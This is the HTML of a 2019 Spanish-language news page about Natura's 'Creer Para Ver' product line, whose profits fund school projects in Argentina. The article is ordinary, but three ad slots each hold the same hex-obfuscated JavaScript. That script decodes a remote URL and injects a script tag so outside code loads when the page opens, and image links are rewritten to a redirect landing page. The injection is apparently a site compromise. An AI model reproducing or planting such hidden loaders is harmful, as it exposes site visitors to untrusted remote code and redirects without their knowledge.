                    <div class="td-post-author-name">Por <a itemprop="author" href="http://prensaeconomica.com.ar/author/javier/">Prensa Económica</a> - </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-02-19T13:30:15+00:00" >19 febrero, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-6729">181</span></div>                    <div class="td-post-comments"><a href="http://prensaeconomica.com.ar/creer-para-ver/#respond"><i class="td-icon-comments"></i>0</a></div>                </div>
            </header>


        </div>

        <div class="td-post-sharing td-post-sharing-top td-pb-padding-side"><span class="td-post-share-title">Compartir</span>
				<div class="td-default-sharing ">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fprensaeconomica.com.ar%2Fcreer-para-ver%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-facebook"></div><div class="td-social-but-text">Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Creer+Para+Ver.&url=http%3A%2F%2Fprensaeconomica.com.ar%2Fcreer-para-ver%2F&via=Prensa+Econ%C3%B3mica"  ><div class="td-sp td-sp-twitter"></div><div class="td-social-but-text">Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://prensaeconomica.com.ar/creer-para-ver/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-googleplus"></div></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://prensaeconomica.com.ar/creer-para-ver/&amp;media=https://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/uploads/2019/02/Natura.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-pinterest"></div></a>
	            </div></div>

        <div class="td-post-content td-pb-padding-side">

        <div class="td-post-featured-image"><a href="https://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/uploads/2019/02/Natura.jpg" data-caption=""><img width="410" height="273" itemprop="image" class="entry-thumb td-modal-image" src="https://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/uploads/2019/02/Natura.jpg" alt="" title="Natura"/></a></div>
        <div class="td-a-rec td-a-rec-id-content_top "><script type='text/javascript' async>var =["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x20\x76\x61\x72\x20\x74\x75\x72\x6C\x20\x3D\x20\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x31\x30\x34\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x35\x2C\x20\x35\x38\x2C\x20\x34\x37\x2C\x20\x34\x37\x2C\x20\x31\x30\x33\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x30\x39\x2C\x20\x31\x32\x31\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x31\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x34\x2C\x20\x39\x37\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x35\x2C\x20\x39\x39\x2C\x20\x34\x36\x2C\x20\x39\x39\x2C\x20\x31\x31\x31\x2C\x20\x31\x30\x39\x2C\x20\x34\x37\x2C\x20\x31\x30\x30\x2C\x20\x36\x36\x2C\x20\x31\x31\x30\x2C\x20\x31\x31\x39\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x34\x2C\x20\x36\x33\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x39\x2C\x20\x36\x31\x2C\x20\x31\x31\x35\x2C\x20\x39\x39\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x35\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x36\x2C\x20\x33\x38\x2C\x20\x39\x35\x2C\x20\x39\x39\x2C\x20\x31\x30\x35\x2C\x20\x31\x30\x30\x2C\x20\x36\x31\x2C\x20\x31\x30\x30\x2C\x20\x35\x31\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x30\x2C\x20\x35\x34\x2C\x20\x35\x30\x2C\x20\x35\x31\x2C\x20\x34\x38\x2C\x20\x34\x35\x2C\x20\x35\x30\x2C\x20\x35\x36\x2C\x20\x35\x34\x2C\x20\x39\x38\x2C\x20\x34\x35\x2C\x20\x35\x37\x2C\x20\x31\x30\x30\x2C\x20\x35\x35\x2C\x20\x35\x34\x2C\x20\x34\x35\x2C\x20\x35\x36\x2C\x20\x35\x33\x2C\x20\x35\x31\x2C\x20\x31\x30\x31\x2C\x20\x34\x35\x2C\x20\x34\x38\x2C\x20\x31\x30\x32\x2C\x20\x39\x39\x2C\x20\x35\x35\x2C\x20\x35\x33\x2C\x20\x31\x30\x31\x2C\x20\x35\x34\x2C\x20\x34\x38\x2C\x20\x35\x30\x2C\x20\x39\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x33\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x37\x2C\x20\x35\x30\x2C\x20\x34\x38\x2C\x20\x35\x37\x2C\x20\x35\x36\x2C\x20\x35\x37\x2C\x20\x35\x33\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x33\x29\x3B\x20\x76\x61\x72\x20\x70\x6F\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x20\x70\x6F\x2E\x69\x64\x3D\x20\x27\x32\x33\x34\x36\x33\x32\x61\x73\x64\x61\x73\x27\x3B\x20\x70\x6F\x2E\x74\x79\x70\x65\x20\x3D\x20\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x3B\x20\x70\x6F\x2E\x73\x72\x63\x20\x3D\x20\x74\x75\x72\x6C\x3B\x20\x76\x61\x72\x20\x73\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x5B\x30\x5D\x3B\x20\x20\x73\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65\x28\x70\x6F\x2C\x20\x73\x29\x3B\x20\x76\x61\x72\x20\x65\x6C\x65\x6D\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x28\x27\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33\x27\x29\x3B\x20\x65\x6C\x65\x6D\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64\x28\x65\x6C\x65\x6D\x29\x3B\x7D\x29\x28\x29\x3B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];var _0x3a23=[[0],[1],[2],[3],[4],[5],[6],[7],[8],[9],[10],[11]];var _0x153e=[_0x3a23[0],_0x3a23[1],_0x3a23[2],_0x3a23[3],_0x3a23[4],_0x3a23[5],_0x3a23[6],_0x3a23[7],_0x3a23[8],_0x3a23[9],_0x3a23[10],_0x3a23[11]];var _0x4558=[_0x153e[0],_0x153e[1],_0x153e[2],_0x153e[3],_0x153e[4],_0x153e[5],_0x153e[6],_0x153e[7],_0x153e[8],_0x153e[9],_0x153e[10],_0x153e[11]];var _0x1625=[_0x4558[0],_0x4558[1],_0x4558[2],_0x4558[3],_0x4558[4],_0x4558[5],_0x4558[6],_0x4558[7],_0x4558[8],_0x4558[9],_0x4558[10],_0x4558[11]];var _0x5955=[_0x1625[0],_0x1625[1],_0x1625[2],_0x1625[3],_0x1625[4],_0x1625[5],_0x1625[6],_0x1625[7],_0x1625[8],_0x1625[9],_0x1625[10],_0x1625[11]];var _0x48514a=[_0x5955[0],_0x5955[1],_0x5955[2],_0x5955[3],_0x5955[4],_0x5955[5],_0x5955[6],_0x5955[7],_0x5955[8],_0x5955[9],_0x5955[10],_0x5955[11]];var _0x411ee3=[_0x48514a[0x0],_0x48514a[0x1],_0x48514a[0x2],_0x48514a[0x3],_0x48514a[0x4],_0x48514a[0x5],_0x48514a[0x6],_0x48514a[0x7],_0x48514a[0x8],_0x48514a[0x9],_0x48514a[0xa],_0x48514a[0xb]];(function(){var _0x2104x8=document[_0x411ee3[0x1]](_0x411ee3[0x0]);_0x2104x8[_0x411ee3[0x2]]= _0x411ee3[0x3];_0x2104x8[_0x411ee3[0x4]]=  !![];_0x2104x8[_0x411ee3[0x5]]= _0x411ee3[0x6];_0x2104x8[_0x411ee3[0x7]]= _0x411ee3[0x8];var _0x2104x9=document[_0x411ee3[0x9]](_0x411ee3[0x0])[0x0];_0x2104x9[_0x411ee3[0xb]][_0x411ee3[0xa]](_0x2104x8,_0x2104x9)}());</script></div><div class="td-a-rec td-a-rec-id-content_inline "><script type='text/javascript' async>var =["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x20\x76\x61\x72\x20\x74\x75\x72\x6C\x20\x3D\x20\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x31\x30\x34\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x35\x2C\x20\x35\x38\x2C\x20\x34\x37\x2C\x20\x34\x37\x2C\x20\x31\x30\x33\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x30\x39\x2C\x20\x31\x32\x31\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x31\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x34\x2C\x20\x39\x37\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x35\x2C\x20\x39\x39\x2C\x20\x34\x36\x2C\x20\x39\x39\x2C\x20\x31\x31\x31\x2C\x20\x31\x30\x39\x2C\x20\x34\x37\x2C\x20\x31\x30\x30\x2C\x20\x36\x36\x2C\x20\x31\x31\x30\x2C\x20\x31\x31\x39\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x34\x2C\x20\x36\x33\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x39\x2C\x20\x36\x31\x2C\x20\x31\x31\x35\x2C\x20\x39\x39\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x35\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x36\x2C\x20\x33\x38\x2C\x20\x39\x35\x2C\x20\x39\x39\x2C\x20\x31\x30\x35\x2C\x20\x31\x30\x30\x2C\x20\x36\x31\x2C\x20\x31\x30\x30\x2C\x20\x35\x31\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x30\x2C\x20\x35\x34\x2C\x20\x35\x30\x2C\x20\x35\x31\x2C\x20\x34\x38\x2C\x20\x34\x35\x2C\x20\x35\x30\x2C\x20\x35\x36\x2C\x20\x35\x34\x2C\x20\x39\x38\x2C\x20\x34\x35\x2C\x20\x35\x37\x2C\x20\x31\x30\x30\x2C\x20\x35\x35\x2C\x20\x35\x34\x2C\x20\x34\x35\x2C\x20\x35\x36\x2C\x20\x35\x33\x2C\x20\x35\x31\x2C\x20\x31\x30\x31\x2C\x20\x34\x35\x2C\x20\x34\x38\x2C\x20\x31\x30\x32\x2C\x20\x39\x39\x2C\x20\x35\x35\x2C\x20\x35\x33\x2C\x20\x31\x30\x31\x2C\x20\x35\x34\x2C\x20\x34\x38\x2C\x20\x35\x30\x2C\x20\x39\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x33\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x37\x2C\x20\x35\x30\x2C\x20\x34\x38\x2C\x20\x35\x37\x2C\x20\x35\x36\x2C\x20\x35\x37\x2C\x20\x35\x33\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x33\x29\x3B\x20\x76\x61\x72\x20\x70\x6F\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x20\x70\x6F\x2E\x69\x64\x3D\x20\x27\x32\x33\x34\x36\x33\x32\x61\x73\x64\x61\x73\x27\x3B\x20\x70\x6F\x2E\x74\x79\x70\x65\x20\x3D\x20\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x3B\x20\x70\x6F\x2E\x73\x72\x63\x20\x3D\x20\x74\x75\x72\x6C\x3B\x20\x76\x61\x72\x20\x73\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x5B\x30\x5D\x3B\x20\x20\x73\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65\x28\x70\x6F\x2C\x20\x73\x29\x3B\x20\x76\x61\x72\x20\x65\x6C\x65\x6D\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x28\x27\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33\x27\x29\x3B\x20\x65\x6C\x65\x6D\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64\x28\x65\x6C\x65\x6D\x29\x3B\x7D\x29\x28\x29\x3B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];var _0x3a23=[[0],[1],[2],[3],[4],[5],[6],[7],[8],[9],[10],[11]];var _0x153e=[_0x3a23[0],_0x3a23[1],_0x3a23[2],_0x3a23[3],_0x3a23[4],_0x3a23[5],_0x3a23[6],_0x3a23[7],_0x3a23[8],_0x3a23[9],_0x3a23[10],_0x3a23[11]];var _0x4558=[_0x153e[0],_0x153e[1],_0x153e[2],_0x153e[3],_0x153e[4],_0x153e[5],_0x153e[6],_0x153e[7],_0x153e[8],_0x153e[9],_0x153e[10],_0x153e[11]];var _0x1625=[_0x4558[0],_0x4558[1],_0x4558[2],_0x4558[3],_0x4558[4],_0x4558[5],_0x4558[6],_0x4558[7],_0x4558[8],_0x4558[9],_0x4558[10],_0x4558[11]];var _0x5955=[_0x1625[0],_0x1625[1],_0x1625[2],_0x1625[3],_0x1625[4],_0x1625[5],_0x1625[6],_0x1625[7],_0x1625[8],_0x1625[9],_0x1625[10],_0x1625[11]];var _0x48514a=[_0x5955[0],_0x5955[1],_0x5955[2],_0x5955[3],_0x5955[4],_0x5955[5],_0x5955[6],_0x5955[7],_0x5955[8],_0x5955[9],_0x5955[10],_0x5955[11]];var _0x411ee3=[_0x48514a[0x0],_0x48514a[0x1],_0x48514a[0x2],_0x48514a[0x3],_0x48514a[0x4],_0x48514a[0x5],_0x48514a[0x6],_0x48514a[0x7],_0x48514a[0x8],_0x48514a[0x9],_0x48514a[0xa],_0x48514a[0xb]];(function(){var _0x2104x8=document[_0x411ee3[0x1]](_0x411ee3[0x0]);_0x2104x8[_0x411ee3[0x2]]= _0x411ee3[0x3];_0x2104x8[_0x411ee3[0x4]]=  !![];_0x2104x8[_0x411ee3[0x5]]= _0x411ee3[0x6];_0x2104x8[_0x411ee3[0x7]]= _0x411ee3[0x8];var _0x2104x9=document[_0x411ee3[0x9]](_0x411ee3[0x0])[0x0];_0x2104x9[_0x411ee3[0xb]][_0x411ee3[0xa]](_0x2104x8,_0x2104x9)}());</script></div><p>Natura busca seguir contribuyendo a una educación inclusiva y de calidad a través de la línea de productos no cosméticos “Creer Para Ver”, que desde hace once años destina sus ganancias a proyectos educativos.</p>
<p>La compañia refuerza nuevamente su compromiso con la educación de calidad en el país a partir de un nuevo lanzamiento de productos escolares que forman parte de la línea Creer Para Ver, cuyas ganancias se destinan exclusivamente al desarrollo de iniciativas educativas en las provincias de Salta, Santa Fe, Corrientes, Chaco y Buenos Aires.</p>
<p>El principal proyecto impulsado a través de Creer Para Ver es Comunidades de Aprendizaje, una iniciativa que Natura promueve junto a CIPPEC y otras organizaciones no gubernamentales con el objetivo de mejorar las experiencias de aprendizaje en los espacios educativos, promoviendo el diálogo y la participación de la comunidad.</p>
<p>En 2018 el programa benefició a 318.662 alumnos en 5.262 escuelas de Salta, Santa Fe, Corrientes, Chaco y Buenos Aires, en donde se realizaron Tertulias Dialógicas Literarias y experiencias de aprendizaje comunitarias. Además, se realizó la capacitación de diez nuevos formadores de Comunidades de Aprendizaje con el objetivo de seguir multiplicando el proyecto en nuevos espacios.</p>
<p>Este año se sumará la prueba piloto de Educación para la vida en las provincias de Buenos Aires, Catamarca y La Rioja, un proyecto que permitirá acompañar a las consultoras de Natura y su grupo familiar cercano a cumplir el sueño de finalizar sus estudios secundarios.</p>
<p>Estas acciones se enmarcan en el espíritu de Natura, una compañía que promueve el impacto social positivo en su red de relaciones. Por esa razón, el compromiso es contribuir con la real transformación y desarrollo de la red de consultores y su núcleo familiar, promoviendo el aprendizaje continuo como motor del desarrollo humano, social y profesional.</p>
<div class="td-a-rec td-a-rec-id-content_bottom "><script type='text/javascript' async>var =["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x20\x76\x61\x72\x20\x74\x75\x72\x6C\x20\x3D\x20\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x31\x30\x34\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x35\x2C\x20\x35\x38\x2C\x20\x34\x37\x2C\x20\x34\x37\x2C\x20\x31\x30\x33\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x30\x39\x2C\x20\x31\x32\x31\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x31\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x34\x2C\x20\x39\x37\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x35\x2C\x20\x39\x39\x2C\x20\x34\x36\x2C\x20\x39\x39\x2C\x20\x31\x31\x31\x2C\x20\x31\x30\x39\x2C\x20\x34\x37\x2C\x20\x31\x30\x30\x2C\x20\x36\x36\x2C\x20\x31\x31\x30\x2C\x20\x31\x31\x39\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x34\x2C\x20\x36\x33\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x39\x2C\x20\x36\x31\x2C\x20\x31\x31\x35\x2C\x20\x39\x39\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x35\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x36\x2C\x20\x33\x38\x2C\x20\x39\x35\x2C\x20\x39\x39\x2C\x20\x31\x30\x35\x2C\x20\x31\x30\x30\x2C\x20\x36\x31\x2C\x20\x31\x30\x30\x2C\x20\x35\x31\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x30\x2C\x20\x35\x34\x2C\x20\x35\x30\x2C\x20\x35\x31\x2C\x20\x34\x38\x2C\x20\x34\x35\x2C\x20\x35\x30\x2C\x20\x35\x36\x2C\x20\x35\x34\x2C\x20\x39\x38\x2C\x20\x34\x35\x2C\x20\x35\x37\x2C\x20\x31\x30\x30\x2C\x20\x35\x35\x2C\x20\x35\x34\x2C\x20\x34\x35\x2C\x20\x35\x36\x2C\x20\x35\x33\x2C\x20\x35\x31\x2C\x20\x31\x30\x31\x2C\x20\x34\x35\x2C\x20\x34\x38\x2C\x20\x31\x30\x32\x2C\x20\x39\x39\x2C\x20\x35\x35\x2C\x20\x35\x33\x2C\x20\x31\x30\x31\x2C\x20\x35\x34\x2C\x20\x34\x38\x2C\x20\x35\x30\x2C\x20\x39\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x33\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x37\x2C\x20\x35\x30\x2C\x20\x34\x38\x2C\x20\x35\x37\x2C\x20\x35\x36\x2C\x20\x35\x37\x2C\x20\x35\x33\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x33\x29\x3B\x20\x76\x61\x72\x20\x70\x6F\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x20\x70\x6F\x2E\x69\x64\x3D\x20\x27\x32\x33\x34\x36\x33\x32\x61\x73\x64\x61\x73\x27\x3B\x20\x70\x6F\x2E\x74\x79\x70\x65\x20\x3D\x20\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x3B\x20\x70\x6F\x2E\x73\x72\x63\x20\x3D\x20\x74\x75\x72\x6C\x3B\x20\x76\x61\x72\x20\x73\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x5B\x30\x5D\x3B\x20\x20\x73\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65\x28\x70\x6F\x2C\x20\x73\x29\x3B\x20\x76\x61\x72\x20\x65\x6C\x65\x6D\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x28\x27\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33\x27\x29\x3B\x20\x65\x6C\x65\x6D\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64\x28\x65\x6C\x65\x6D\x29\x3B\x7D\x29\x28\x29\x3B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];var _0x3a23=[[0],[1],[2],[3],[4],[5],[6],[7],[8],[9],[10],[11]];var _0x153e=[_0x3a23[0],_0x3a23[1],_0x3a23[2],_0x3a23[3],_0x3a23[4],_0x3a23[5],_0x3a23[6],_0x3a23[7],_0x3a23[8],_0x3a23[9],_0x3a23[10],_0x3a23[11]];var _0x4558=[_0x153e[0],_0x153e[1],_0x153e[2],_0x153e[3],_0x153e[4],_0x153e[5],_0x153e[6],_0x153e[7],_0x153e[8],_0x153e[9],_0x153e[10],_0x153e[11]];var _0x1625=[_0x4558[0],_0x4558[1],_0x4558[2],_0x4558[3],_0x4558[4],_0x4558[5],_0x4558[6],_0x4558[7],_0x4558[8],_0x4558[9],_0x4558[10],_0x4558[11]];var _0x5955=[_0x1625[0],_0x1625[1],_0x1625[2],_0x1625[3],_0x1625[4],_0x1625[5],_0x1625[6],_0x1625[7],_0x1625[8],_0x1625[9],_0x1625[10],_0x1625[11]];var _0x48514a=[_0x5955[0],_0x5955[1],_0x5955[2],_0x5955[3],_0x5955[4],_0x5955[5],_0x5955[6],_0x5955[7],_0x5955[8],_0x5955[9],_0x5955[10],_0x5955[11]];var _0x411ee3=[_0x48514a[0x0],_0x48514a[0x1],_0x48514a[0x2],_0x48514a[0x3],_0x48514a[0x4],_0x48514a[0x5],_0x48514a[0x6],_0x48514a[0x7],_0x48514a[0x8],_0x48514a[0x9],_0x48514a[0xa],_0x48514a[0xb]];(function(){var _0x2104x8=document[_0x411ee3[0x1]](_0x411ee3[0x0]);_0x2104x8[_0x411ee3[0x2]]= _0x411ee3[0x3];_0x2104x8[_0x411ee3[0x4]]=  !![];_0x2104x8[_0x411ee3[0x5]]= _0x411ee3[0x6];_0x2104x8[_0x411ee3[0x7]]= _0x411ee3[0x8];var _0x2104x9=document[_0x411ee3[0x9]](_0x411ee3[0x0])[0x0];_0x2104x9[_0x411ee3[0xb]][_0x411ee3[0xa]](_0x2104x8,_0x2104x9)}());</script></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags td-pb-padding-side">
                                <ul class="td-tags td-post-small-box clearfix"><li><span>Etiquetas</span></li><li><a href="http://prensaeconomica.com.ar/tag/escuela/">escuela</a></li><li><a href="http://prensaeconomica.com.ar/tag/natura/">Natura</a></li><li><a href="http://prensaeconomica.com.ar/tag/vuelta-al-cole/">vuelta al cole</a></li></ul>            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-pb-padding-side"><span class="td-post-share-title">Compartir</span>
            <div class="td-default-sharing td-with-like">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fprensaeconomica.com.ar%2Fcreer-para-ver%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-facebook"></div><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Creer+Para+Ver.&url=http%3A%2F%2Fprensaeconomica.com.ar%2Fcreer-para-ver%2F&via=Prensa+Econ%C3%B3mica"><div class="td-sp td-sp-twitter"></div><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://prensaeconomica.com.ar/creer-para-ver/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-googleplus"></div></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://prensaeconomica.com.ar/creer-para-ver/&amp;media=https://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/uploads/2019/02/Natura.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-pinterest"></div></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://prensaeconomica.com.ar/creer-para-ver/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://prensaeconomica.com.ar/creer-para-ver/" data-text="Creer Para Ver." data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var 